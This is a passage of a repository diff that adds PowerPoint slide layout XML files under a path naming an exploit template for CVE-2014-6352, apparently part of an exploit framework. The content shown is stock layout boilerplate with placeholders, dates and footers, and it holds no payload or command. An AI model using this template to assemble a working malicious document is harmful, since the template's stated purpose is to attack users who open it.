lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="4" name="Date Placeholder 3"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="dt" sz="half" idx="10"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{A3E2BFEF-B464-43B7-BACB-B80E2ED36959}" type="datetimeFigureOut"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>11/12/2014</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="5" name="Footer Placeholder 4"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="ftr" sz="quarter" idx="11"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="6" name="Slide Number Placeholder 5"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="sldNum" sz="quarter" idx="12"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{FDE0A223-AA89-463D-95C0-64ABE7403E02}" type="slidenum"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>#</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp></p:spTree></p:cSld><p:clrMapOvr><a:masterClrMapping/></p:clrMapOvr></p:sldLayout>

2
data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout11.xml Executable file
View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<p:sldLayout xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" type="vertTitleAndTx" preserve="1"><p:cSld name="Vertical Title and Text"><p:spTree><p:nvGrpSpPr><p:cNvPr id="1" name=""/><p:cNvGrpSpPr/><p:nvPr/></p:nvGrpSpPr><p:grpSpPr><a:xfrm><a:off x="0" y="0"/><a:ext cx="0" cy="0"/><a:chOff x="0" y="0"/><a:chExt cx="0" cy="0"/></a:xfrm></p:grpSpPr><p:sp><p:nvSpPr><p:cNvPr id="2" name="Vertical Title 1"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="title" orient="vert"/></p:nvPr></p:nvSpPr><p:spPr><a:xfrm><a:off x="6629400" y="274638"/><a:ext cx="2057400" cy="5851525"/></a:xfrm></p:spPr><p:txBody><a:bodyPr vert="eaVert"/><a:lstStyle/><a:p><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master title style</a:t></a:r><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="3" name="Vertical Text Placeholder 2"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="body" orient="vert" idx="1"/></p:nvPr></p:nvSpPr><p:spPr><a:xfrm><a:off x="457200" y="274638"/><a:ext cx="6019800" cy="5851525"/></a:xfrm></p:spPr><p:txBody><a:bodyPr vert="eaVert"/><a:lstStyle/><a:p><a:pPr lvl="0"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master text styles</a:t></a:r></a:p><a:p><a:pPr lvl="1"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Second level</a:t></a:r></a:p><a:p><a:pPr lvl="2"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Third level</a:t></a:r></a:p><a:p><a:pPr lvl="3"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Fourth level</a:t></a:r></a:p><a:p><a:pPr lvl="4"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Fifth level</a:t></a:r><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="4" name="Date Placeholder 3"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="dt" sz="half" idx="10"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{A3E2BFEF-B464-43B7-BACB-B80E2ED36959}" type="datetimeFigureOut"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>11/12/2014</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="5" name="Footer Placeholder 4"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="ftr" sz="quarter" idx="11"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="6" name="Slide Number Placeholder 5"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="sldNum" sz="quarter" idx="12"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{FDE0A223-AA89-463D-95C0-64ABE7403E02}" type="slidenum"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>#</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp></p:spTree></p:cSld><p:clrMapOvr><a:masterClrMapping/></p:clrMapOvr></p:sldLayout>

2
data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout2.xml Executable file
View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<p:sldLayout xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" type="obj" preserve="1"><p:cSld name="Title and Content"><p:spTree><p:nvGrpSpPr><p:cNvPr id="1" name=""/><p:cNvGrpSpPr/><p:nvPr/></p:nvGrpSpPr><p:grpSpPr><a:xfrm><a:off x="0" y="0"/><a:ext cx="0" cy="0"/><a:chOff x="0" y="0"/><a:chExt cx="0" cy="0"/></a:xfrm></p:grpSpPr><p:sp><p:nvSpPr><p:cNvPr id="2" name="Title 1"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="title"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master title style</a:t></a:r><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="3" name="Content Placeholder 2"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph idx="1"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:pPr lvl="0"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master text styles</a:t></a:r></a:p><a:p><a:pPr lvl="1"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Second level</a:t></a:r></a:p><a:p><a:pPr lvl="2"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Third level</a:t></a:r></a:p><a:p><a:pPr lvl="3"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Fourth level</a:t></a:r></a:p><a:p><a:pPr lvl="4"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Fifth level</a:t></a:r><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="4" name="Date Placeholder 3"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="dt" sz="half" idx="10"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{A3E2BFEF-B464-43B7-BACB-B80E2ED36959}" type="datetimeFigureOut"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>11/12/2014</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="5" name="Footer Placeholder 4"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="ftr" sz="quarter" idx="11"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="6" name="Slide Number Placeholder 5"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="sldNum" sz="quarter" idx="12"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{FDE0A223-AA89-463D-95C0-64ABE7403E02}" type="slidenum"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>#</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp></p:spTree></p:cSld><p:clrMapOvr><a:masterClrMapping/></p:clrMapOvr></p:sldLayout>

2
data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout3.xml Executable file
View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<p:sldLayout xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" type="secHead" preserve="1"><p:cSld name="Section Header"><p:spTree><p:nvGrpSpPr><p:cNvPr id="1" name=""/><p:cNvGrpSpPr/><p:nvPr/></p:nvGrpSpPr><p:grpSpPr><a:xfrm><a:off x="0" y="0"/><a:ext cx="0" cy="0"/><a:chOff x="0" y="0"/><a:chExt cx="0" cy="0"/></a:xfrm></p:grpSpPr><p:sp><p:nvSpPr><p:cNvPr id="2" name="Title 1"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="title"/></p:nvPr></p:nvSpPr><p:spPr><a:xfrm><a:off x="722313" y="4406900"/><a:ext cx="7772400" cy="1362075"/></a:xfrm></p:spPr><p:txBody><a:bodyPr anchor="t"/><a:lstStyle><a:lvl1pPr algn="l"><a:defRPr sz="4000" b="1" cap="all"/></a:lvl1pPr></a:lstStyle><a:p><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master title style</a:t></a:r><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="3" name="Text Placeholder 2"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="body" idx="1"/></p:nvPr></p:nvSpPr><p:spPr><a:xfrm><a:off x="722313" y="2906713"/><a:ext cx="7772400" cy="1500187"/></a:xfrm></p:spPr><p:txBody><a:bodyPr anchor="b"/><a:lstStyle><a:lvl1pPr marL="0" indent="0"><a:buNone/><a:defRPr sz="2000"><a:solidFill><a:schemeClr val="tx1"><a:tint val="75000"/></a:schemeClr></a:solidFill></a:defRPr></a:lvl1pPr><a:lvl2pPr marL="457200" indent="0"><a:buNone/><a:defRPr sz="1800"><a:solidFill><a:schemeClr val="tx1"><a:tint val="75000"/></a:schemeClr></a:solidFill></a:defRPr></a:lvl2pPr><a:lvl3pPr marL="914400" indent="0"><a:buNone/><a:defRPr sz="1600"><a:solidFill><a:schemeClr val="tx1"><a:tint val="75000"/></a:schemeClr></a:solidFill></a:defRPr></a:lvl3pPr><a:lvl4pPr marL="1371600" indent="0"><a:buNone/><a:defRPr sz="1400"><a:solidFill><a:schemeClr val="tx1"><a:tint val="75000"/></a:schemeClr></a:solidFill></a:defRPr></a:lvl4pPr><a:lvl5pPr marL="1828800" indent="0"><a:buNone/><a:defRPr sz="1400"><a:solidFill><a:schemeClr val="tx1"><a:tint val="75000"/></a:schemeClr></a:solidFill></a:defRPr></a:lvl5pPr><a:lvl6pPr marL="2286000" indent="0"><a:buNone/><a:defRPr sz="1400"><a:solidFill><a:schemeClr val="tx1"><a:tint val="75000"/></a:schemeClr></a:solidFill></a:defRPr></a:lvl6pPr><a:lvl7pPr marL="2743200" indent="0"><a:buNone/><a:defRPr sz="1400"><a:solidFill><a:schemeClr val="tx1"><a:tint val="75000"/></a:schemeClr></a:solidFill></a:defRPr></a:lvl7pPr><a:lvl8pPr marL="3200400" indent="0"><a:buNone/><a:defRPr sz="1400"><a:solidFill><a:schemeClr val="tx1"><a:tint val="75000"/></a:schemeClr></a:solidFill></a:defRPr></a:lvl8pPr><a:lvl9pPr marL="3657600" indent="0"><a:buNone/><a:defRPr sz="1400"><a:solidFill><a:schemeClr val="tx1"><a:tint val="75000"/></a:schemeClr></a:solidFill></a:defRPr></a:lvl9pPr></a:lstStyle><a:p><a:pPr lvl="0"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master text styles</a:t></a:r></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="4" name="Date Placeholder 3"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="dt" sz="half" idx="10"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{A3E2BFEF-B464-43B7-BACB-B80E2ED36959}" type="datetimeFigureOut"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>11/12/2014</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="5" name="Footer Placeholder 4"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="ftr" sz="quarter" idx="11"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="6" name="Slide Number Placeholder 5"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="sldNum" sz="quarter" idx="12"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{FDE0A223-AA89-463D-95C0-64ABE7403E02}" type="slidenum"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>#</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp></p:spTree></p:cSld><p:clrMapOvr><a:masterClrMapping/></p:clrMapOvr></p:sldLayout>

2
data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout4.xml Executable file
View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<p:sldLayout xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" type="twoObj" preserve="1"><p:cSld name="Two Content"><p:spTree><p:nvGrpSpPr><p:cNvPr id="1" name=""/><p:cNvGrpSpPr/><p:nvPr/></p:nvGrpSpPr><p:grpSpPr><a:xfrm><a:off x="0" y="0"/><a:ext cx="0" cy="0"/><a:chOff x="0" y="0"/><a:chExt cx="0" cy="0"/></a:xfrm></p:grpSpPr><p:sp><p:nvSpPr><p:cNvPr id="2" name="Title 1"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="title"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master title style</a:t></a:r><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="3" name="Content Placeholder 2"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph sz="half" idx="1"/></p:nvPr></p:nvSpPr><p:spPr><a:xfrm><a:off x="457200" y="1600200"/><a:ext cx="4038600" cy="4525963"/></a:xfrm></p:spPr><p:txBody><a:bodyPr/><a:lstStyle><a:lvl1pPr><a:defRPr sz="2800"/></a:lvl1pPr><a:lvl2pPr><a:defRPr sz="2400"/></a:lvl2pPr><a:lvl3pPr><a:defRPr sz="2000"/></a:lvl3pPr><a:lvl4pPr><a:defRPr sz="1800"/></a:lvl4pPr><a:lvl5pPr><a:defRPr sz="1800"/></a:lvl5pPr><a:lvl6pPr><a:defRPr sz="1800"/></a:lvl6pPr><a:lvl7pPr><a:defRPr sz="1800"/></a:lvl7pPr><a:lvl8pPr><a:defRPr sz="1800"/></a:lvl8pPr><a:lvl9pPr><a:defRPr sz="1800"/></a:lvl9pPr></a:lstStyle><a:p><a:pPr lvl="0"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master text styles</a:t></a:r></a:p><a:p><a:pPr lvl="1"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Second level</a:t></a:r></a:p><a:p><a:pPr lvl="2"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Third level</a:t></a:r></a:p><a:p><a:pPr lvl="3"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Fourth level</a:t></a:r></a:p><a:p><a:pPr lvl="4"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Fifth level</a:t></a:r><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="4" name="Content Placeholder 3"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph sz="half" idx="2"/></p:nvPr></p:nvSpPr><p:spPr><a:xfrm><a:off x="4648200" y="1600200"/><a:ext cx="4038600" cy="4525963"/></a:xfrm></p:spPr><p:txBody><a:bodyPr/><a:lstStyle><a:lvl1pPr><a:defRPr sz="2800"/></a:lvl1pPr><a:lvl2pPr><a:defRPr sz="2400"/></a:lvl2pPr><a:lvl3pPr><a:defRPr sz="2000"/></a:lvl3pPr><a:lvl4pPr><a:defRPr sz="1800"/></a:lvl4pPr><a:lvl5pPr><a:defRPr sz="1800"/></a:lvl5pPr><a:lvl6pPr><a:defRPr sz="1800"/></a:lvl6pPr><a:lvl7pPr><a:defRPr sz="1800"/></a:lvl7pPr><a:lvl8pPr><a:defRPr sz="1800"/></a:lvl8pPr><a:lvl9pPr><a:defRPr sz="1800"/></a:lvl9pPr></a:lstStyle><a:p><a:pPr lvl="0"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master text styles</a:t></a:r></a:p><a:p><a:pPr lvl="1"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Second level</a:t></a:r></a:p><a:p><a:pPr lvl="2"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Third level</a:t></a:r></a:p><a:p><a:pPr lvl="3"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Fourth level</a:t></a:r></a:p><a:p><a:pPr lvl="4"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Fifth level</a:t></a:r><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="5" name="Date Placeholder 4"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="dt" sz="half" idx="10"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{A3E2BFEF-B464-43B7-BACB-B80E2ED36959}" type="datetimeFigureOut"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>11/12/2014</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="6" name="Footer Placeholder 5"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="ftr" sz="quarter" idx="11"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="7" name="Slide Number Placeholder 6"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="sldNum" sz="quarter" idx="12"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{FDE0A223-AA89-463D-95C0-64ABE7403E02}" type="slidenum"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>#</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp></p:spTree></p:cSld><p:clrMapOvr><a:masterClrMapping/></p:clrMapOvr></p:sldLayout>

2
data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout5.xml Executable file
View File

File diff suppressed because one or more lines are too long

2
data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout6.xml Executable file
View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<p:sldLayout xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" type="titleOnly" preserve="1"><p:cSld name="Title Only"><p:spTree><p:nvGrpSpPr><p:cNvPr id="1" name=""/><p:cNvGrpSpPr/><p:nvPr/></p:nvGrpSpPr><p:grpSpPr><a:xfrm><a:off x="0" y="0"/><a:ext cx="0" cy="0"/><a:chOff x="0" y="0"/><a:chExt cx="0" cy="0"/></a:xfrm></p:grpSpPr><p:sp><p:nvSpPr><p:cNvPr id="2" name="Title 1"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="title"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master title style</a:t></a:r><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="3" name="Date Placeholder 2"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="dt" sz="half" idx="10"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{A3E2BFEF-B464-43B7-BACB-B80E2ED36959}" type="datetimeFigureOut"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>11/12/2014</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="4" name="Footer Placeholder 3"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="ftr" sz="quarter" idx="11"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="5" name="Slide Number Placeholder 4"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="sldNum" sz="quarter" idx="12"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{FDE0A223-AA89-463D-95C0-64ABE7403E02}" type="slidenum"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>#</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp></p:spTree></p:cSld><p:clrMapOvr><a:masterClrMapping/></p:clrMapOvr></p:sldLayout>

2
data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout7.xml Executable file
View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<p:sldLayout xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" type="blank" preserve="1"><p:cSld name="Blank"><p:spTree><p:nvGrpSpPr><p:cNvPr id="1" name=""/><p:cNvGrpSpPr/><p:nvPr/></p:nvGrpSpPr><p:grpSpPr><a:xfrm><a:off x="0" y="0"/><a:ext cx="0" cy="0"/><a:chOff x="0" y="0"/><a:chExt cx="0" cy="0"/></a:xfrm></p:grpSpPr><p:sp><p:nvSpPr><p:cNvPr id="2" name="Date Placeholder 1"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="dt" sz="half" idx="10"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{A3E2BFEF-B464-43B7-BACB-B80E2ED36959}" type="datetimeFigureOut"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>11/12/2014</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="3" name="Footer Placeholder 2"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="ftr" sz="quarter" idx="11"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="4" name="Slide Number Placeholder 3"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="sldNum" sz="quarter" idx="12"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{FDE0A223-AA89-463D-95C0-64ABE7403E02}" type="slidenum"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>#</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp></p:spTree></p:cSld><p:clrMapOvr><a:masterClrMapping/></p:clrMapOvr></p:sldLayout>

2
data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout8.xml Executable file
View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<p:sldLayout xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" type="objTx" preserve="1"><p:cSld name="Content with Caption"><p:spTree><p:nvGrpSpPr><p:cNvPr id="1" name=""/><p:cNvGrpSpPr/><p:nvPr/></p:nvGrpSpPr><p:grpSpPr><a:xfrm><a:off x="0" y="0"/><a:ext cx="0" cy="0"/><a:chOff x="0" y="0"/><a:chExt cx="0" cy="0"/></a:xfrm></p:grpSpPr><p:sp><p:nvSpPr><p:cNvPr id="2" name="Title 1"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="title"/></p:nvPr></p:nvSpPr><p:spPr><a:xfrm><a:off x="457200" y="273050"/><a:ext cx="3008313" cy="1162050"/></a:xfrm></p:spPr><p:txBody><a:bodyPr anchor="b"/><a:lstStyle><a:lvl1pPr algn="l"><a:defRPr sz="2000" b="1"/></a:lvl1pPr></a:lstStyle><a:p><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master title style</a:t></a:r><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="3" name="Content Placeholder 2"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph idx="1"/></p:nvPr></p:nvSpPr><p:spPr><a:xfrm><a:off x="3575050" y="273050"/><a:ext cx="5111750" cy="5853113"/></a:xfrm></p:spPr><p:txBody><a:bodyPr/><a:lstStyle><a:lvl1pPr><a:defRPr sz="3200"/></a:lvl1pPr><a:lvl2pPr><a:defRPr sz="2800"/></a:lvl2pPr><a:lvl3pPr><a:defRPr sz="2400"/></a:lvl3pPr><a:lvl4pPr><a:defRPr sz="2000"/></a:lvl4pPr><a:lvl5pPr><a:defRPr sz="2000"/></a:lvl5pPr><a:lvl6pPr><a:defRPr sz="2000"/></a:lvl6pPr><a:lvl7pPr><a:defRPr sz="2000"/></a:lvl7pPr><a:lvl8pPr><a:defRPr sz="2000"/></a:lvl8pPr><a:lvl9pPr><a:defRPr sz="2000"/></a:lvl9pPr></a:lstStyle><a:p><a:pPr lvl="0"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master text styles</a:t></a:r></a:p><a:p><a:pPr lvl="1"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Second level</a:t></a:r></a:p><a:p><a:pPr lvl="2"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Third level</a:t></a:r></a:p><a:p><a:pPr lvl="3"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Fourth level</a:t></a:r></a:p><a:p><a:pPr lvl="4"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Fifth level</a:t></a:r><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="4" name="Text Placeholder 